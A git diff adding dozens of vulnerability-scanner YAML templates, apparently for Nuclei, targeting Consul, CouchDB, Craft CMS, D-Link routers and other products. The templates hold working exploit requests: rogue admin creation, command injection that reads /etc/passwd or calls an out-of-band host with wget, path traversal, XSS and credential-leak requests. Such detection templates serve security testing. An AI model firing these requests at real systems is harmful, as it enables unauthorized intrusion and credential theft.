b/config/51pwn/yaml/Consul/consul-service-rce.yaml @@ -0,0 +1,39 @@ +id: consul-service-rce +info: + name: Consul Rexec Rce + author: + - l0ne1y + description: |- + Hashicorp Consul Services API远程命令执行漏洞 + Consul是HashiCorp公司推出的一款开源工具,用于实现分布式系统的服务发现与配置。与其他分布式服务注册与发现的方案相比,Consul提供的方案更为“一站式”。Consul内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(例如ZooKeeper等),使用方式也相对简单。 + + Consul使用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);且安装包中仅包含一个可执行文件,便于部署,可与Docker等轻量级容器无缝配合。 + + 在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求在未经授权的情况下在Consul服务端远程执行命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.consul.io/downloads + + 临时修复方案: + 1、禁用Consul服务器上的脚本检查功能 + 2、确保Consul HTTP API服务无法通过外网访问或调用 + 3、对/v1/agent/service/register 禁止PUT方法 +requests: +- matchers: + - type: word + part: body + words: + - '"EnableScriptChecks": true' + - '"EnableRemoteScriptChecks": true' + - type: word + words: + - json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/v1/agent/self' + method: GET diff --git a/config/51pwn/yaml/Coremail/coremail-config-disclosure.yaml b/config/51pwn/yaml/Coremail/coremail-config-disclosure.yaml new file mode 100755 index 000000000..b3acc6d56 --- /dev/null +++ b/config/51pwn/yaml/Coremail/coremail-config-disclosure.yaml @@ -0,0 +1,35 @@ +id: coremail-config-disclosure +info: + name: Coremail Config Disclosure + author: + - l0ne1y + description: |- + Coremail论客邮件系统存在信息泄露漏洞 + Coremail论客邮件系统是目前国内拥有邮箱使用用户最多的邮件系统。 + + Coremail论客邮件系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.coremail.cn + + 临时修复方案: + 1、去除页面中涉及的敏感信息 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + condition: or + words: + - + - containerDefinitions + - coremail + - + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/' + method: GET diff --git a/config/51pwn/yaml/CouchCMS/CVE-2018-7662.yaml b/config/51pwn/yaml/CouchCMS/CVE-2018-7662.yaml new file mode 100755 index 000000000..b3881877c --- /dev/null +++ b/config/51pwn/yaml/CouchCMS/CVE-2018-7662.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-7662 +info: + name: CouchCMS <= 2.0 - Path Disclosure + author: + - l0ne1y + description: |- + Webzyme Couch路径泄露漏洞 + Webzyme Couch是美国Webzyme Softwares公司的一套开源内容管理系统(CMS)。 + + Webzyme Couch中存在安全漏洞。远程攻击者可通过向includes/mysql2i/mysql2i.func.php或addons/phpmailer/phpmailer.php文件发送直接请求利用该漏洞获取完整路径。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/CouchCMS/CouchCMS/issues/46 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - mysql2i.func.php on line 10 + - 'Fatal error: Cannot redeclare mysql_affected_rows() in' + - type: word + condition: and + part: body + words: + - phpmailer.php on line 10 + - 'Fatal error: Call to a menber function add_event_listener() on a non-object + in' + matchers-condition: or + path: + - '{{BaseURL}}/includes/mysql2i/mysql2i.func.php' + - '{{BaseURL}}/addons/phpmailer/phpmailer.php' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/CouchDB/CVE-2017-12635.yaml b/config/51pwn/yaml/CouchDB/CVE-2017-12635.yaml new file mode 100755 index 000000000..d01a6b49d --- /dev/null +++ b/config/51pwn/yaml/CouchDB/CVE-2017-12635.yaml @@ -0,0 +1,48 @@ +id: CVE-2017-12635 +info: + name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation + author: + - l0ne1y + description: |- + Apache CouchDB 越权创建管理员漏洞 + Apache CouchDB是美国阿帕奇(Apache)软件基金会的一个免费、开源、面向文档的数据库,是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 + + Apache CouchDB 1.7.0之前的版本和2.1.1之前的2.x版本中存在权限提升漏洞,该漏洞源于基于rlang的JSON解析器和基于JavaScript的JSON解析器之间存在差异。攻击者可利用该漏洞访问任意的shell命令或获取管理员权限。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E +requests: +- matchers: + - type: word + part: header + words: + - application/json + - 'Location:' + - type: word + part: body + words: + - org.couchdb.user:{{verify}} + - conflict + - Document update conflict + - type: status + status: + - 201 + - 409 + matchers-condition: and + raw: + - | + PUT /_users/org.couchdb.user:{{verify}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + + { + "type": "user", + "name": "{{verify}}", + "roles": ["_admin"], + "roles": [], + "password": "123456" + } +variables: + verify: '{{rand_int(200000000, 210000000)}}' diff --git a/config/51pwn/yaml/CouchDB/couchdb-unauth.yaml b/config/51pwn/yaml/CouchDB/couchdb-unauth.yaml new file mode 100755 index 000000000..6eee89d15 --- /dev/null +++ b/config/51pwn/yaml/CouchDB/couchdb-unauth.yaml @@ -0,0 +1,35 @@ +id: couchdb-unauth +info: + name: couchdb exposure + author: + - organiccrap + description: |- + CouchDB 未授权访问漏洞 + CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 + + CouchDB 默认会在 5984 端口开放 Restful 的 API 接口,如果使用 SSL 的话就会监听在 6984 端口,用于数据库的管理功能。其 HTTP Server 默认开启时没有进行验证,而且绑定在 0.0.0.0,所有用户均可通过 API 访问导致未授权访问。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://couchdb.apache.org/ + + 临时修复方案: + 1、指定CouchDB绑定的IP (需要重启CouchDB才能生效) 在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1 ,然后保存。注:修改后只有本机才能访问CouchDB。 + 2、设置访问密码 (需要重启CouchDB才能生效) 在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - httpd_design_handlers + - external_manager + - replicator_manager + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/_config' + method: GET diff --git a/config/51pwn/yaml/CraftCMS/CVE-2020-9757.yaml b/config/51pwn/yaml/CraftCMS/CVE-2020-9757.yaml new file mode 100755 index 000000000..8fb1e6b8e --- /dev/null +++ b/config/51pwn/yaml/CraftCMS/CVE-2020-9757.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-9757 +info: + name: Craftcms Seomatic Rce + author: + - l0ne1y + description: |- + Craft CMS SEOmatic 组件 < 3.3.0 模版注入漏洞 + Craft CMS是一套内容管理系统(CMS)。Seomatic是其中的一个SEO(搜索引擎优化)组件。 + + Seomatic 3.3.0之前版本(用于Craft CMS)中存在安全漏洞。攻击者可利用该漏洞向服务器端注入模板,获取信息。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://craftcms.com/ +requests: +- matchers: + - type: word + condition: and + part: body + words: + - MetaLinkContainer + - canonical + - '{{verify}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{{{verify}}}}' + method: GET +- matchers: + - type: word + condition: and + part: body + words: + - MetaLinkContainer + - canonical + - '{{verify}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{{{verify}}}}' + method: GET +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/CyBroHttpServer/CVE-2018-16133.yaml b/config/51pwn/yaml/CyBroHttpServer/CVE-2018-16133.yaml new file mode 100755 index 000000000..79c931bc9 --- /dev/null +++ b/config/51pwn/yaml/CyBroHttpServer/CVE-2018-16133.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-16133 +info: + name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal + author: + - l0ne1y + description: |- + Cybrotech CyBroHttpServer 任意文件读取漏洞 + Cybrotech CyBroHttpServer是英国Cybrotech公司的一款用于按名称读取/写入CyBro变量的通信服务器。 + + Cybrotech CyBroHttpServer 1.0.3版本中存在目录遍历漏洞。攻击者可借助URI中的‘../’利用该漏洞读取敏感信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cybrotech.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + raw: + - |+ + GET \..\..\..\..\Windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true diff --git a/config/51pwn/yaml/Cyberoam NetGenie/CVE-2021-38702.yaml b/config/51pwn/yaml/Cyberoam NetGenie/CVE-2021-38702.yaml new file mode 100755 index 000000000..de0f0dba6 --- /dev/null +++ b/config/51pwn/yaml/Cyberoam NetGenie/CVE-2021-38702.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-38702 +info: + name: Cyberoam NetGenie Cross-Site Scripting + author: + - l0ne1y + description: |- + Cyberoam NetGenie 跨站脚本漏洞 + Cyber​​oam NetGenie是一个路由器。 + + Cyberoam NetGenie存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://www.cyberoamworks.com/NetGenie-Home.asp + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2018-10822.yaml b/config/51pwn/yaml/D-Link/CVE-2018-10822.yaml new file mode 100755 index 000000000..5fc85e550 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2018-10822.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10822 +info: + name: D-Link Routers - Directory Traversal + author: + - l0ne1y + description: |- + D-Link路由器httpd server任意文件读取漏洞 + D-Link DWR-116等都是友讯(D-Link)公司的无线路由器产品。 + + 多款D-Link产品中的Web界面存在目录遍历漏洞。远程攻击者可通过将/..或//放置在‘GET /uir’之后并发送HTTP请求利用该漏洞读取任意文件。以下产品和版本受到影响:D-Link DWR-116 1.06及之前版本;DIR-140L 1.02及之前版本;DIR-640L 1.02及之前版本;DWR-512 2.02及之前版本;DWR-712 2.02及之前版本;DWR-912 2.02及之前版本;DWR-921 2.02及之前版本;DWR-111 1.01及之前版本。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/uir//etc/passwd' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2018-10823.yaml b/config/51pwn/yaml/D-Link/CVE-2018-10823.yaml new file mode 100755 index 000000000..d55d1e801 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2018-10823.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-10823 +info: + name: D-Link Routers - Command Injection + author: + - l0ne1y + description: |- + D-Link路由器httpd server shell命令注入漏洞 + D-Link DWR-116等都是友讯(D-Link)公司的无线路由器产品。 + + 多款D-Link产品中存在安全漏洞。攻击者可通过向hkisg.htm页面的‘Sip’参数注入shell命令利用该漏洞执行任意代码。以下产品和版本受到影响:D-Link DWR-116 1.06及之前版本;DWR-512 2.02及之前版本;DWR-712 2.02及之前版本;DWR-912 2.02及之前版本;DWR-921 2.02及之前版本;DWR-111 1.01及之前版本。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,randstr) + - '!regex("echo.*?{{randstr}}",body)' + - status_code == 200 + path: + - '{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20echo%20{{randstr}}' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2018-15517.yaml b/config/51pwn/yaml/D-Link/CVE-2018-15517.yaml new file mode 100755 index 000000000..20477efc6 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2018-15517.yaml @@ -0,0 +1,24 @@ +id: CVE-2018-15517 +info: + name: D-Link Central WifiManager - Server-Side Request Forgery + author: + - l0ne1y + description: |- + D-Link Central WiFiManager CWM-100 服务器端请求伪造漏洞 + D-Link Central WiFiManager CWM-100是友讯(D-Link)公司的一套基于Web的无线接入点管理系统。该系统支持集中管理无线访问接入点。 + + D-Link Central WiFiManager CWM-100 1.03 r0098版本中的MailConnect功能存在服务器端请求伪造漏洞。攻击者可利用该漏洞进行端口扫描。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + path: + - '{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2019-13101.yaml b/config/51pwn/yaml/D-Link/CVE-2019-13101.yaml new file mode 100755 index 000000000..d5baab69e --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2019-13101.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-13101 +info: + name: D-Link DIR-600M Authentication Bypass + author: + - l0ne1y + description: |- + D-Link DIR-600M 身份验证绕过漏洞 + D-Link DIR-600M是中国台湾友讯(D-Link)公司的一款无线路由器。 + + D-Link DIR-600M中存在访身份验证绕过漏洞,该漏洞源于用户无需身份验证便可直接访问wan.htm文件。攻击者可利用该漏洞泄露信息或更改页面的数据字段。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - /PPPoE/ + matchers-condition: and + raw: + - | + GET /wan.htm HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} diff --git a/config/51pwn/yaml/D-Link/CVE-2019-16920.yaml b/config/51pwn/yaml/D-Link/CVE-2019-16920.yaml new file mode 100755 index 000000000..30fd20624 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2019-16920.yaml @@ -0,0 +1,51 @@ +id: CVE-2019-16920 +info: + name: D-Link Routers - Remote Code Execution + author: + - l0ne1y + description: |- + D-Link路由器操作系统命令注入漏洞 + D-Link DIR-655C等都是中国台湾友讯(D-Link)公司的一款无线路由器。 + + 多款D-Link产品中存在操作系统命令注入漏洞。攻击者可利用该漏洞注入命令,进而入侵系统。以下产品及版本受到影响:D-Link DIR-655C;DIR-866L;DIR-652;DHP-1565等。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - \[(font|extension|file)s\] + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} diff --git a/config/51pwn/yaml/D-Link/CVE-2019-17506.yaml b/config/51pwn/yaml/D-Link/CVE-2019-17506.yaml new file mode 100755 index 000000000..ab68a87b3 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2019-17506.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-17506 +info: + name: D-Link DIR-868L/817LW - Information Disclosure + author: + - l0ne1y + description: |- + D-Link DIR-817LW和D-Link DIR-868L 未授权访问漏洞 + D-Link DIR-817LW和D-Link DIR-868L都是中国台湾友讯(D-Link)公司的一款无线路由器。 + + D-Link DIR-868L B1-2.03版本和DIR-817LW A1-1.04版本中存在未授权访问漏洞,该漏洞源于一些Web界面没有要求进行身份验证。攻击者可利用该漏洞获取用户名和密码,进而远程控制路由器。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: word + condition: and + part: body + words: + - + - DEVICE.ACCOUNT + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/getcfg.php' + method: POST + body: | + SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a + headers: + Content-Type: text/xml diff --git a/config/51pwn/yaml/D-Link/CVE-2020-24579.yaml b/config/51pwn/yaml/D-Link/CVE-2020-24579.yaml new file mode 100755 index 000000000..dbc64a599 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2020-24579.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-24579 +info: + name: D-Link DSL 2888a - Remote Command Execution + author: + - l0ne1y + description: |- + D-link DSL-2888A访问控制错误导致远程命令执行漏洞 + D-link DSL-2888A是中国D-link公司的一款统一服务路由器。 + + D-Link DSL-2888A devices 存在授权问题漏洞,该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,randstr) + - '!regex("echo.*?{{randstr}}",body)' + - status_code == 200 + raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Cookie: uid=6gPjT2ipmNz + + username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b + - | + GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Cookie: uid=6gPjT2ipmNz diff --git a/config/51pwn/yaml/D-Link/CVE-2020-25078.yaml b/config/51pwn/yaml/D-Link/CVE-2020-25078.yaml new file mode 100755 index 000000000..ac2ca84f7 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2020-25078.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-25078 +info: + name: D-Link DCS-2530L Administrator password disclosure + author: + - l0ne1y + description: |- + D-Link DCS-2530L和DCS-2670L信息泄露漏洞 + D-Link DCS-2670L和D-Link DCS-2530L都是Bitcoin(D-Link)组织的一款无线路由器。 + + D-Link DCS-2530L 1.06.01 Hotfix之前版本和DCS-2670L 2.02版本及之前版本中存在安全漏洞。该漏洞会导致远程管理员密码泄露。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 +requests: +- matchers: + - type: word + condition: and + words: + - name= + - pass= + - type: word + part: header + words: + - text/plain + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/config/getuser?index=0' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2020-25506.yaml b/config/51pwn/yaml/D-Link/CVE-2020-25506.yaml new file mode 100755 index 000000000..8db415c4c --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2020-25506.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-25506 +info: + name: D-Link DNS-320 Unauthenticated Remote Code Execution + author: + - l0ne1y + description: |- + D-Link DNS-320 命令注入漏洞 + D-Link DNS-320是中国台湾友讯(D-Link)公司的一款NAS(网络附属存储)设备。 + + D-Link DNS-320 FW v2.06B01 Revision 存在命令注入漏洞,该漏洞源于mgr.cgi组件中的命令注入影响,可能导致远程任意执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + Accept: */* diff --git a/config/51pwn/yaml/D-Link/CVE-2020-9376.yaml b/config/51pwn/yaml/D-Link/CVE-2020-9376.yaml new file mode 100755 index 000000000..88bb35b10 --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2020-9376.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-9376 +info: + name: D-Link Information Disclosure via getcfg.php + author: + - l0ne1y + description: |- + D-Link DIR-610 信息泄露漏洞 + D-Link DIR-610是中国台湾友讯(D-Link)公司的一款无线路由器。 + + D-Link DIR-610中存在安全漏洞。攻击者可通过向getcfg.php文件发送SERVICES=DEVICE.ACCOUNT\\%0AAUTHORIZED_GROUP=1利用该漏洞导致信息泄露。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - Admin + - + - + matchers-condition: and + path: + - '{{BaseURL}}/getcfg.php' + method: POST + body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 + headers: + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/D-Link/CVE-2021-21816.yaml b/config/51pwn/yaml/D-Link/CVE-2021-21816.yaml new file mode 100755 index 000000000..43a74a7dd --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2021-21816.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-21816 +info: + name: D-Link DIR-3040 - Syslog Information Disclosure + author: + - l0ne1y + description: |- + D-LINK DIR-3040 信息泄露漏洞 + D-Link D-LINK DIR-3040是中国台湾友讯(D-Link)公司的一个路由器。提供连接网络的功能。 + + D-LINK DIR-3040 存在信息泄露漏洞,攻击者可以发送HTTP请求导致敏感信息的泄露。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: word + condition: and + part: body + words: + - 'syslog:' + - admin + - /etc_ro/lighttpd/www + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/messages' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2021-46379.yaml b/config/51pwn/yaml/D-Link/CVE-2021-46379.yaml new file mode 100755 index 000000000..ce35994ac --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2021-46379.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-46379 +info: + name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect + author: + - l0ne1y + description: |- + D-Link DIR850 ET850-1.08TRb03 URL重定向漏洞 + D-Link DIR850 ET850-1.08TRb03是中国台湾友讯(D-Link)公司的一款路由器。 + + D-Link DIR850 ET850-1.08TRb03 存在安全漏洞,该漏洞源于 DLink DIR850 ET850-1.08TRb03 受到通过 URL 重定向到不受信任站点的不正确访问控制漏洞的影响。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)bing\.com\/?(\/|[^.].*)?$ + path: + - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://bing.com&wlan_id=1' + method: GET diff --git a/config/51pwn/yaml/D-Link/CVE-2021-46381.yaml b/config/51pwn/yaml/D-Link/CVE-2021-46381.yaml new file mode 100755 index 000000000..019615b6e --- /dev/null +++ b/config/51pwn/yaml/D-Link/CVE-2021-46381.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-46381 +info: + name: D-Link DAP-1620 - Local File Inclusion + author: + - l0ne1y + description: |- + D-Link DAP-1620 路径遍历导致任意文件读取漏洞 + D-Link DAP-1620是中国台湾友讯(D-Link)公司的一个无线中继扩展器。 + + D-Link DAP-1620 存在路径遍历漏洞,该漏洞源于 D-Link DAP-1620 中的路径遍历导致的本地文件包含导致未经授权的内部文件读取 [/etc/passwd] 和 [/etc/shadow]。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + path: + - '{{BaseURL}}/apply.cgi' + method: POST + body: action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass diff --git a/config/51pwn/yaml/D-Link/dlink-850L-info-leak.yaml b/config/51pwn/yaml/D-Link/dlink-850L-info-leak.yaml new file mode 100755 index 000000000..70b80a4e3 --- /dev/null +++ b/config/51pwn/yaml/D-Link/dlink-850L-info-leak.yaml @@ -0,0 +1,34 @@ +id: dlink-850L-info-leak +info: + name: Dlink Dir-850L Info Leak + author: + - l0ne1y + description: |- + D-Link DIR-850L 信息泄露漏洞 + D-Link DIR-850L是友讯(D-Link)公司的一款无线路由器。 + + D-Link DIR-850L存在信息泄露漏洞,可获取管理员用户名和密码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + - + matchers-condition: and + path: + - '{{BaseURL}}/hedwig.cgi' + method: POST + body: | + ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml + headers: + Content-Type: text/xml + Cookie: uid=R8tBjwtFc8 diff --git a/config/51pwn/yaml/D-Link/dlink-file-read.yaml b/config/51pwn/yaml/D-Link/dlink-file-read.yaml new file mode 100755 index 000000000..475c16deb --- /dev/null +++ b/config/51pwn/yaml/D-Link/dlink-file-read.yaml @@ -0,0 +1,27 @@ +id: dlink-file-read +info: + name: D-Link - Arbitrary File Retrieval + author: + - l0ne1y + description: |- + D-Link 任意文件读取漏洞 + 任意文件读取/下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.dlink.com/ +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/webproc' + method: POST + body: errorpage=/etc/passwd&obj-action=auth&:action=login diff --git "a/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-0929.yaml" "b/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-0929.yaml" new file mode 100755 index 000000000..eaa288811 --- /dev/null +++ "b/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-0929.yaml" @@ -0,0 +1,35 @@ +id: CVE-2017-0929 +info: + name: DotNetNuke ImageHandler SSRF + author: + - l0ne1y + description: |- + DotNetNuke ImageHandler 